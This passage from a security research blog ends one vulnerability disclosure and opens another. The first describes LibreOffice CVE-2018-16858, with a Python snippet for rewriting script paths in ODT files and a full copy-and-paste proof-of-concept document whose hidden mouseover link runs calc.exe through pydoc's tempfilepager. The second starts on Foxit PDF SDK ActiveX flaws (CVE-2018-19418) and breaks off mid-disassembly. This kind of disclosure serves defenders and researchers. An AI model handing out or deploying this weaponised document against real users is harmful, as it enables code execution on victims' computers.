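         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            data = src.read(item.filename)
            if item.filename == "content.xml":
                data = data.replace(old_href.encode(), new_href.encode())
            dst.writestr(item, data)
    return out.getvalue()

# Tiny stand-in archive to demonstrate the rewrite:
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("content.xml",
               '<a xlink:href="vnd.sun.star.script:TableSample.py"/>')

patched = patch_odt(buf.getvalue(),
                    "vnd.sun.star.script:TableSample.py",
                    "vnd.sun.star.script:../../../TableSample.py")
with zipfile.ZipFile(io.BytesIO(patched)) as z:
    result = z.read("content.xml").decode()
print(result)
```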
Lastly I changed the content of TableSample.py in the C:\ folder so it would create a file in case it is executed. I used the same ODT file again to execute the python file and the file was successfully dropped. That meant I was able to execute any python file from the local file system, without a warning dialog, as soon as the mouse is over the hyperlink in the document.

Exploitation

To properly exploit this behavior, we need to find a way to load a python file we have control over and know its location. At first I was investigating the location parameter of the vnd.sun.star.script protocol handler: "LOCPARAM identifies the container of the script, i.e. My Macros, or OpenOffice.org Macros, or within the current document, or in an extension." If we can specify a python script in the current document, we should have no problem loading a custom python script. This idea was a dead end really quickly, as by specifying location=document a dialog is shown, explaining that macros hosted inside the document are currently disabled. The next idea was abusing the location=user parameter. On Windows, the user location points inside the AppData directory of the current user. The idea was to abuse the path traversal to traverse down into the user's Download directory and load the ODT file as a python script (ergo creating a polyglot file, which is a python file + a working ODT file). Sadly this was a dead end as well, as LibreOffice does not like any data before the ODT Zip header.
The solution

For the solution I looked into the python parsing code a little more in depth and discovered that it is not only possible to specify the function you want to call inside a python script, but it is possible to pass parameters as well (this feature seems to have been introduced in the 6.1.x branch):

<script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:../../../../../../../../../TableSample.py$functionName(param1,param2)?language=Python&location=share" xlink:type="simple"/>

As LibreOffice ships with its own python interpreter, and therefore a bunch of python scripts, I started to examine them for potentially insecure functions I could abuse. After some digging I discovered the following code:

File: C:\Program Files\LibreOffice\program\python-core-3.5.5\lib\pydoc.py

Code:

def tempfilepager(text, cmd):
    """Page through text by invoking a program on a temporary file."""
    import tempfile
    filename = tempfile.mktemp()
    with open(filename, 'w', errors='backslashreplace') as file:
        file.write(text)
    try:
        os.system(cmd + ' "' + filename + '"')
    finally:
        os.unlink(filename)

The user controlled cmd parameter is passed to the os.system call, which just passes the string to a subshell (cmd.exe on Windows), thereby allowing execution of a local file with parameters:

<script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:../../../program/python-core-3.5.5/lib/pydoc.py$tempfilepager(1, calc.exe )?language=Python&location=share" xlink:type="simple"/>

Some notes regarding the Proof-of-Concept Video. I changed the color of the Hyperlink to white so it can't be seen. Additionally the link covers the whole page, therefore increasing the chance a user moves his mouse over the link and executes my payload:

Reporting the bug

Reporting the bug was kind of a wild ride. At first I reported it via the libreoffice bugzilla system.
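The injection is easy to see if you reproduce just the string concatenation from tempfilepager: whatever arrives in the cmd parameter is glued, unquoted and unvalidated, onto the front of the command line that os.system hands to the subshell. A harmless reconstruction (building the string without ever executing it; the filename is an illustrative stand-in for the tempfile.mktemp() result):

```python
# Reproduce only the command-string construction from pydoc's
# tempfilepager; os.system would pass this whole string to a subshell
# (cmd.exe on Windows), so controlling cmd means controlling the command.
def build_command(cmd, filename):
    return cmd + ' "' + filename + '"'

# The PoC passes " calc.exe " as the attacker-controlled cmd parameter:
command = build_command(" calc.exe ",
                        r"C:\Users\victim\AppData\Local\Temp\tmp1234")
print(command)
```

The resulting string starts with the attacker's program name, followed by the quoted temp file path as its argument — exactly what the PoC event listener exploits.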
Apparently for security issues it is better to send an email to officesecurity@lists.freedesktop.org, but I did not know that. So my bugzilla report got closed, but I convinced them to have another look. The bug was picked up and moved to a thread via officesecurity@lists.freedesktop.org. The issue was verified and fixed quite fast.

Timeline:
18.10.2018 - reported the bug
30.10.2018 - bug was fixed and added to daily builds
14.11.2018 - CVE-2018-16858 was assigned by Redhat - got told that 31.01.2019 is the date I can publish
01.02.2019 - Blogpost published

The path traversal is fixed in (I just tested these versions):
Libreoffice: 6.1.4.2
Libreoffice: 6.0.7

Vulnerable:
Openoffice: 4.1.6 (latest version)

I reconfirmed via email that I am allowed to publish the details of the vulnerability although openoffice is still unpatched. Openoffice does not allow passing parameters, therefore my PoC does not work, but the path traversal can be abused to execute a python script from another location on the local file system. To disable the support for python, the pythonscript.py in the installation folder can be either removed or renamed (for example, on linux: /opt/openoffice4/program/pythonscript.py).

Additional note

As I had some additional time until I could publish this blogpost, I thought about ImageMagick, as it is using LibreOffice (soffice) to convert certain file types. It is possible to use certain events to trigger the execution of a script as shown above, but one additional parameter will be passed, which you have no control of. Therefore my PoC does not work, but in case you are able to reference your own local python file, it is possible to abuse it via ImageMagick as well (given that 6.1.2.1 or another vulnerable version is installed).

Proof-of-concept - Copy&Paste and save it with an .fodt extension! Openoffice does not support FODT files, so it is necessary to open it with Libreoffice and save it as an ODT file.
<?xml version="1.0" encoding="UTF-8"?> <office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:officeooo="http://openoffice.org/2009/office" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" 
xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.text"> <office:meta><meta:creation-date>2019-01-30T10:53:06.762000000</meta:creation-date><dc:date>2019-01-30T10:53:49.512000000</dc:date><meta:editing-duration>PT44S</meta:editing-duration><meta:editing-cycles>1</meta:editing-cycles><meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="1" meta:word-count="1" meta:character-count="4" meta:non-whitespace-character-count="4"/><meta:generator>LibreOffice/6.1.2.1$Windows_X86_64 LibreOffice_project/65905a128db06ba48db947242809d14d3f9a93fe</meta:generator></office:meta> <office:settings> <config:config-item-set config:name="ooo:view-settings"> <config:config-item config:name="ViewAreaTop" config:type="long">0</config:config-item> <config:config-item config:name="ViewAreaLeft" config:type="long">0</config:config-item> <config:config-item config:name="ViewAreaWidth" config:type="long">35959</config:config-item> <config:config-item config:name="ViewAreaHeight" config:type="long">12913</config:config-item> <config:config-item config:name="ShowRedlineChanges" config:type="boolean">true</config:config-item> <config:config-item config:name="InBrowseMode" config:type="boolean">false</config:config-item> <config:config-item-map-indexed config:name="Views"> <config:config-item-map-entry> <config:config-item config:name="ViewId" config:type="string">view2</config:config-item> <config:config-item config:name="ViewLeft" config:type="long">9772</config:config-item> <config:config-item config:name="ViewTop" config:type="long">2501</config:config-item> <config:config-item config:name="VisibleLeft" config:type="long">0</config:config-item> <config:config-item config:name="VisibleTop" config:type="long">0</config:config-item> <config:config-item 
config:name="VisibleRight" config:type="long">35957</config:config-item> <config:config-item config:name="VisibleBottom" config:type="long">12912</config:config-item> <config:config-item config:name="ZoomType" config:type="short">0</config:config-item> <config:config-item config:name="ViewLayoutColumns" config:type="short">1</config:config-item> <config:config-item config:name="ViewLayoutBookMode" config:type="boolean">false</config:config-item> <config:config-item config:name="ZoomFactor" config:type="short">100</config:config-item> <config:config-item config:name="IsSelectedFrame" config:type="boolean">false</config:config-item> <config:config-item config:name="AnchoredTextOverflowLegacy" config:type="boolean">false</config:config-item> </config:config-item-map-entry> </config:config-item-map-indexed> </config:config-item-set> <config:config-item-set config:name="ooo:configuration-settings"> <config:config-item config:name="ProtectForm" config:type="boolean">false</config:config-item> <config:config-item config:name="PrinterName" config:type="string"/> <config:config-item config:name="EmbeddedDatabaseName" config:type="string"/> <config:config-item config:name="CurrentDatabaseDataSource" config:type="string"/> <config:config-item config:name="LinkUpdateMode" config:type="short">1</config:config-item> <config:config-item config:name="AddParaTableSpacingAtStart" config:type="boolean">true</config:config-item> <config:config-item config:name="FloattableNomargins" config:type="boolean">false</config:config-item> <config:config-item config:name="UnbreakableNumberings" config:type="boolean">false</config:config-item> <config:config-item config:name="FieldAutoUpdate" config:type="boolean">true</config:config-item> <config:config-item config:name="AddVerticalFrameOffsets" config:type="boolean">false</config:config-item> <config:config-item config:name="BackgroundParaOverDrawings" config:type="boolean">false</config:config-item> <config:config-item 
config:name="AddParaTableSpacing" config:type="boolean">true</config:config-item> <config:config-item config:name="ChartAutoUpdate" config:type="boolean">true</config:config-item> <config:config-item config:name="CurrentDatabaseCommand" config:type="string"/> <config:config-item config:name="AlignTabStopPosition" config:type="boolean">true</config:config-item> <config:config-item config:name="PrinterSetup" config:type="base64Binary"/> <config:config-item config:name="PrinterPaperFromSetup" config:type="boolean">false</config:config-item> <config:config-item config:name="IsKernAsianPunctuation" config:type="boolean">false</config:config-item> <config:config-item config:name="CharacterCompressionType" config:type="short">0</config:config-item> <config:config-item config:name="ApplyUserData" config:type="boolean">true</config:config-item> <config:config-item config:name="SaveGlobalDocumentLinks" config:type="boolean">false</config:config-item> <config:config-item config:name="SmallCapsPercentage66" config:type="boolean">false</config:config-item> <config:config-item config:name="CurrentDatabaseCommandType" config:type="int">0</config:config-item> <config:config-item config:name="SaveVersionOnClose" config:type="boolean">false</config:config-item> <config:config-item config:name="UpdateFromTemplate" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintSingleJobs" config:type="boolean">false</config:config-item> <config:config-item config:name="PrinterIndependentLayout" config:type="string">high-resolution</config:config-item> <config:config-item config:name="EmbedSystemFonts" config:type="boolean">false</config:config-item> <config:config-item config:name="DoNotCaptureDrawObjsOnPage" config:type="boolean">false</config:config-item> <config:config-item config:name="UseFormerObjectPositioning" config:type="boolean">false</config:config-item> <config:config-item config:name="IsLabelDocument" config:type="boolean">false</config:config-item> 
<config:config-item config:name="AddFrameOffsets" config:type="boolean">false</config:config-item> <config:config-item config:name="AddExternalLeading" config:type="boolean">true</config:config-item> <config:config-item config:name="UseOldNumbering" config:type="boolean">false</config:config-item> <config:config-item config:name="OutlineLevelYieldsNumbering" config:type="boolean">false</config:config-item> <config:config-item config:name="DoNotResetParaAttrsForNumFont" config:type="boolean">false</config:config-item> <config:config-item config:name="IgnoreFirstLineIndentInNumbering" config:type="boolean">false</config:config-item> <config:config-item config:name="AllowPrintJobCancel" config:type="boolean">true</config:config-item> <config:config-item config:name="UseFormerLineSpacing" config:type="boolean">false</config:config-item> <config:config-item config:name="AddParaSpacingToTableCells" config:type="boolean">true</config:config-item> <config:config-item config:name="UseFormerTextWrapping" config:type="boolean">false</config:config-item> <config:config-item config:name="RedlineProtectionKey" config:type="base64Binary"/> <config:config-item config:name="ConsiderTextWrapOnObjPos" config:type="boolean">false</config:config-item> <config:config-item config:name="DoNotJustifyLinesWithManualBreak" config:type="boolean">false</config:config-item> <config:config-item config:name="EmbedFonts" config:type="boolean">false</config:config-item> <config:config-item config:name="TableRowKeep" config:type="boolean">false</config:config-item> <config:config-item config:name="TabsRelativeToIndent" config:type="boolean">true</config:config-item> <config:config-item config:name="IgnoreTabsAndBlanksForLineCalculation" config:type="boolean">false</config:config-item> <config:config-item config:name="RsidRoot" config:type="int">1115298</config:config-item> <config:config-item config:name="LoadReadonly" config:type="boolean">false</config:config-item> <config:config-item 
config:name="ClipAsCharacterAnchoredWriterFlyFrames" config:type="boolean">false</config:config-item> <config:config-item config:name="UnxForceZeroExtLeading" config:type="boolean">false</config:config-item> <config:config-item config:name="UseOldPrinterMetrics" config:type="boolean">false</config:config-item> <config:config-item config:name="TabAtLeftIndentForParagraphsInList" config:type="boolean">false</config:config-item> <config:config-item config:name="Rsid" config:type="int">1115298</config:config-item> <config:config-item config:name="MsWordCompTrailingBlanks" config:type="boolean">false</config:config-item> <config:config-item config:name="MathBaselineAlignment" config:type="boolean">true</config:config-item> <config:config-item config:name="InvertBorderSpacing" config:type="boolean">false</config:config-item> <config:config-item config:name="CollapseEmptyCellPara" config:type="boolean">true</config:config-item> <config:config-item config:name="TabOverflow" config:type="boolean">true</config:config-item> <config:config-item config:name="StylesNoDefault" config:type="boolean">false</config:config-item> <config:config-item config:name="ClippedPictures" config:type="boolean">false</config:config-item> <config:config-item config:name="TabOverMargin" config:type="boolean">false</config:config-item> <config:config-item config:name="TreatSingleColumnBreakAsPageBreak" config:type="boolean">false</config:config-item> <config:config-item config:name="SurroundTextWrapSmall" config:type="boolean">false</config:config-item> <config:config-item config:name="ApplyParagraphMarkFormatToNumbering" config:type="boolean">false</config:config-item> <config:config-item config:name="PropLineSpacingShrinksFirstLine" config:type="boolean">true</config:config-item> <config:config-item config:name="SubtractFlysAnchoredAtFlys" config:type="boolean">false</config:config-item> <config:config-item config:name="DisableOffPagePositioning" config:type="boolean">false</config:config-item> 
<config:config-item config:name="EmptyDbFieldHidesPara" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintAnnotationMode" config:type="short">0</config:config-item> <config:config-item config:name="PrintGraphics" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintBlackFonts" config:type="boolean">false</config:config-item> <config:config-item config:name="PrintProspect" config:type="boolean">false</config:config-item> <config:config-item config:name="PrintLeftPages" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintControls" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintPageBackground" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintTextPlaceholder" config:type="boolean">false</config:config-item> <config:config-item config:name="PrintDrawings" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintHiddenText" config:type="boolean">false</config:config-item> <config:config-item config:name="PrintTables" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintProspectRTL" config:type="boolean">false</config:config-item> <config:config-item config:name="PrintReversed" config:type="boolean">false</config:config-item> <config:config-item config:name="PrintRightPages" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintFaxName" config:type="string"/> <config:config-item config:name="PrintPaperFromSetup" config:type="boolean">false</config:config-item> <config:config-item config:name="PrintEmptyPages" config:type="boolean">false</config:config-item> </config:config-item-set> </office:settings> <office:scripts> <office:script script:language="ooo:Basic"> <ooo:libraries xmlns:ooo="http://openoffice.org/2004/office" xmlns:xlink="http://www.w3.org/1999/xlink"> <ooo:library-embedded 
ooo:name="Standard"/> </ooo:libraries> </office:script> </office:scripts> <office:font-face-decls> <style:font-face style:name="Arial1" svg:font-family="Arial" style:font-family-generic="swiss"/> <style:font-face style:name="Liberation Serif" svg:font-family="'Liberation Serif'" style:font-family-generic="roman" style:font-pitch="variable"/> <style:font-face style:name="Liberation Sans" svg:font-family="'Liberation Sans'" style:font-family-generic="swiss" style:font-pitch="variable"/> <style:font-face style:name="Arial" svg:font-family="Arial" style:font-family-generic="system" style:font-pitch="variable"/> <style:font-face style:name="Microsoft YaHei" svg:font-family="'Microsoft YaHei'" style:font-family-generic="system" style:font-pitch="variable"/> <style:font-face style:name="NSimSun" svg:font-family="NSimSun" style:font-family-generic="system" style:font-pitch="variable"/> </office:font-face-decls> <office:styles> <style:default-style style:family="graphic"> <style:graphic-properties svg:stroke-color="#3465a4" draw:fill-color="#729fcf" fo:wrap-option="no-wrap" draw:shadow-offset-x="0.1181in" draw:shadow-offset-y="0.1181in" draw:start-line-spacing-horizontal="0.1114in" draw:start-line-spacing-vertical="0.1114in" draw:end-line-spacing-horizontal="0.1114in" draw:end-line-spacing-vertical="0.1114in" style:flow-with-text="false"/> <style:paragraph-properties style:text-autospace="ideograph-alpha" style:line-break="strict" style:font-independent-line-spacing="false"> <style:tab-stops/> </style:paragraph-properties> <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="12pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="10.5pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="12pt" style:language-complex="hi" style:country-complex="IN"/> </style:default-style> <style:default-style 
style:family="paragraph"> <style:paragraph-properties fo:orphans="2" fo:widows="2" fo:hyphenation-ladder-count="no-limit" style:text-autospace="ideograph-alpha" style:punctuation-wrap="hanging" style:line-break="strict" style:tab-stop-distance="0.4925in" style:writing-mode="page"/> <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="12pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="10.5pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="12pt" style:language-complex="hi" style:country-complex="IN" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/> </style:default-style> <style:default-style style:family="table"> <style:table-properties table:border-model="collapsing"/> </style:default-style> <style:default-style style:family="table-row"> <style:table-row-properties fo:keep-together="auto"/> </style:default-style> <style:style style:name="Standard" style:family="paragraph" style:class="text"/> <style:style style:name="Heading" style:family="paragraph" style:parent-style-name="Standard" style:next-style-name="Text_20_body" style:class="text"> <style:paragraph-properties fo:margin-top="0.1665in" fo:margin-bottom="0.0835in" loext:contextual-spacing="false" fo:keep-with-next="always"/> <style:text-properties style:font-name="Liberation Sans" fo:font-family="'Liberation Sans'" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="14pt" style:font-name-asian="Microsoft YaHei" style:font-family-asian="'Microsoft YaHei'" style:font-family-generic-asian="system" style:font-pitch-asian="variable" style:font-size-asian="14pt" style:font-name-complex="Arial" style:font-family-complex="Arial" style:font-family-generic-complex="system" style:font-pitch-complex="variable" style:font-size-complex="14pt"/> </style:style> <style:style 
style:name="Text_20_body" style:display-name="Text body" style:family="paragraph" style:parent-style-name="Standard" style:class="text"> <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0.0972in" loext:contextual-spacing="false" fo:line-height="115%"/> </style:style> <style:style style:name="List" style:family="paragraph" style:parent-style-name="Text_20_body" style:class="list"> <style:text-properties style:font-size-asian="12pt" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss"/> </style:style> <style:style style:name="Caption" style:family="paragraph" style:parent-style-name="Standard" style:class="extra"> <style:paragraph-properties fo:margin-top="0.0835in" fo:margin-bottom="0.0835in" loext:contextual-spacing="false" text:number-lines="false" text:line-number="0"/> <style:text-properties fo:font-size="12pt" fo:font-style="italic" style:font-size-asian="12pt" style:font-style-asian="italic" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss" style:font-size-complex="12pt" style:font-style-complex="italic"/> </style:style> <style:style style:name="Index" style:family="paragraph" style:parent-style-name="Standard" style:class="index"> <style:paragraph-properties text:number-lines="false" text:line-number="0"/> <style:text-properties style:font-size-asian="12pt" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss"/> </style:style> <style:style style:name="Internet_20_link" style:display-name="Internet link" style:family="text"> <style:text-properties fo:color="#000080" fo:language="zxx" fo:country="none" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color" style:language-asian="zxx" style:country-asian="none" style:language-complex="zxx" style:country-complex="none"/> </style:style> <text:outline-style style:name="Outline"> 
<text:outline-level-style text:level="1" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="2" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="3" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="4" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="5" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="6" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="7" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="8" 
style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="9" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="10" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> </text:outline-style> <text:notes-configuration text:note-class="footnote" style:num-format="1" text:start-value="0" text:footnotes-position="page" text:start-numbering-at="document"/> <text:notes-configuration text:note-class="endnote" style:num-format="i" text:start-value="0"/> <text:linenumbering-configuration text:number-lines="false" text:offset="0.1965in" style:num-format="1" text:number-position="left" text:increment="5"/> </office:styles> <office:automatic-styles> <style:style style:name="T1" style:family="text"> <style:text-properties officeooo:rsid="001104a2"/> </style:style> <style:page-layout style:name="pm1"> <style:page-layout-properties fo:page-width="8.5in" fo:page-height="11in" style:num-format="1" style:print-orientation="portrait" fo:margin-top="0.7874in" fo:margin-bottom="0.7874in" fo:margin-left="0.7874in" fo:margin-right="0.7874in" style:writing-mode="lr-tb" style:footnote-max-height="0in"> <style:footnote-sep style:width="0.0071in" style:distance-before-sep="0.0398in" style:distance-after-sep="0.0398in" style:line-style="solid" style:adjustment="left" style:rel-width="25%" style:color="#000000"/> </style:page-layout-properties> <style:header-style/> 
<style:footer-style/> </style:page-layout> </office:automatic-styles> <office:master-styles> <style:master-page style:name="Standard" style:page-layout-name="pm1"/> </office:master-styles> <office:body> <office:text> <text:sequence-decls> <text:sequence-decl text:display-outline-level="0" text:name="Illustration"/> <text:sequence-decl text:display-outline-level="0" text:name="Table"/> <text:sequence-decl text:display-outline-level="0" text:name="Text"/> <text:sequence-decl text:display-outline-level="0" text:name="Drawing"/> <text:sequence-decl text:display-outline-level="0" text:name="Figure"/> </text:sequence-decls> <text:p text:style-name="Standard"><text:a xlink:type="simple" xlink:href="http://test/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:../../../program/python-core-3.5.5/lib/pydoc.py$tempfilepager(1, calc.exe )?language=Python&location=share" xlink:type="simple"/></office:event-listeners><text:span text:style-name="T1">move your mouse over the text</text:span></text:a></text:p> </office:text> </office:body> </office:document>

Posted by Alex Inführ
Source: https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html
ActiveX Exploitation in 2019 :: Instantiation is not Scripting
Feb 1, 2019

But didn’t Microsoft kill ActiveX? I hear you asking. Well, they almost did. As most security practitioners know, ActiveX has had a long history of exploitation and its fair share of remote vulnerabilities. Microsoft themselves have had several ActiveX vulnerabilities disclosed, along with many popular third party vendors. Microsoft released an update that essentially killed any scripting of ActiveX objects from a remote context. However, they did leave the ability for ActiveX controls to be instantiated. In some cases, this can still allow for remote code execution via parsing vulnerabilities. I believe this was done for backwards compatibility reasons, for example, situations such as the Microsoft Management Console (MMC), which requires trusted ActiveX controls to be instantiated for system management.

TL;DR
In this post, I discuss the mitigations surrounding ActiveX and how they don’t prevent all attacks. Then I discuss the discovery and exploitation of CVE-2018-19418 and just the discovery of CVE-2018-19447, which are client-side vulnerabilities that allow for remote code execution. The only interaction required is that the victim opens a malicious Office document.

Introduction
The Foxit website explains what Foxit Reader SDK ActiveX is, quickly summing it up as: PDF SDK ActiveX is ideal for product managers and developers who want an easy to use and a customizable visual component that they can simply drag and drop into their application to quickly create a PDF Viewing application without requiring any PDF expertise. There are two versions, the Standard and Professional versions. They differ in that the professional version allows you to run arbitrary JavaScript and has access to many more PDF features. These products are not to be confused with Foxit Reader’s own ActiveX control, which ships with its main product, Foxit Reader.
Its own ActiveX control, located at C:\Program Files\Foxit Software\Foxit Reader\plugins\FoxitReaderBrowserAx.dll, will proxy off the parsing of a PDF to its regular binary, C:\Program Files\Foxit Software\Foxit Reader\FoxitReader.exe. So if there are any parsing vulnerabilities in this code, they can be reached via the DLL as well. Adobe do a similar thing, the only difference being that it is run in a sandbox. The other noticeable difference is that Adobe don’t have standalone ActiveX products, which avoids the need for two different parsers. This avoids situations where a bug may be patched in their core product, yet missed in other PDF parsers that they offer.

The Target
The targets I tested were FoxitPDFSDKActiveX540_Std.msi (eba1a06230cc1a39ccb1fb7f04448a0d78859b60) and FoxitPDFSDKActiveX540_Pro.msi (243a9099c9788dfcf38817f20208e5289b530f56), which were the latest at the time. However, before auditing the control, we need to make sure that we can even instantiate it without any popups or issues. As it turns out, both controls are Safe for Initialization and do not have the kill bit set.

Loaded File: C:\Program Files\Foxit Software\Foxit PDF SDK ActiveX Std\bin\FoxitPDFSDK_AX_Std.ocx
Name: FoxitPDFSDKStdLib
Lib GUID: {5FE9D64A-3BC2-43CB-AA47-F0B0C510EBEA}
Version: 5.0
Lib Classes: 7
Class FoxitPDFSDK
GUID: {0F6C092B-6E4C-4976-B386-27A9FD9E96A1}
Number of Interfaces: 1
Default Interface: _DFoxitPDFSDK
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False

So even though the settings allow us to script it, Microsoft prevents us from doing so with the latest updates (I’m not sure exactly when this was introduced). That’s good, because I audited several of the methods such as OpenFileAsync and found many trivially exploitable stack buffer overflows. I didn’t report them since there doesn’t exist a remote vector anymore. Initially I wanted a vulnerability that would affect both the standard and professional versions.
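As a side note on that KillBitSet check: the kill bit is simply bit 0x00000400 of the "Compatibility Flags" DWORD stored under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}. The registry path and flag value come from Microsoft's documentation; the helper name below is my own, and this is only a sketch of the check, not how the loader actually implements it:

```python
# Sketch: how the ActiveX "kill bit" is encoded. A control is "killed" when
# bit 0x00000400 is set in the "Compatibility Flags" DWORD under
# HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}.
KILL_BIT = 0x00000400  # the documented kill-bit flag value

def kill_bit_set(compatibility_flags: int) -> bool:
    """Return True if this Compatibility Flags value forbids instantiation."""
    return bool(compatibility_flags & KILL_BIT)

# A missing registry entry behaves like flags == 0, which is the situation
# with the Foxit control above: it may still be instantiated.
print(kill_bit_set(0x00000400))  # True  -> control is killed
print(kill_bit_set(0x00000000))  # False -> control loads
```

Other bits of the same DWORD control unrelated compatibility behaviors, which is why the check masks rather than compares for equality.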
Since both products share code, it wasn’t too hard to find what I was looking for. However, as mentioned previously, the standard version does not allow JavaScript. If I went after a memory corruption bug, then I may have a harder time with exploitation since I can’t script anything.

The Vulnerabilities
CVE-2018-19418 - Launch Action New Window Command Injection
Since this was an untouched PDF parser that is remotely accessible, I decided to go after simple things like logic vulnerabilities. The first thing I decided to do was cross reference all calls to CreateProcessW. As it turns out, there were a few actually. But the most interesting was the one in sub_1049FD60 at loc_104A0E80:

.text:10481D95 loc_10481D95: ; CODE XREF: sub_10481D10+81
.text:10481D95 lea ecx, [ebp+ProcessInformation]
.text:10481D98 push ecx ; lpProcessInformation
.text:10481D99 lea edx, [ebp+StartupInfo]
.text:10481D9C push edx ; lpStartupInfo
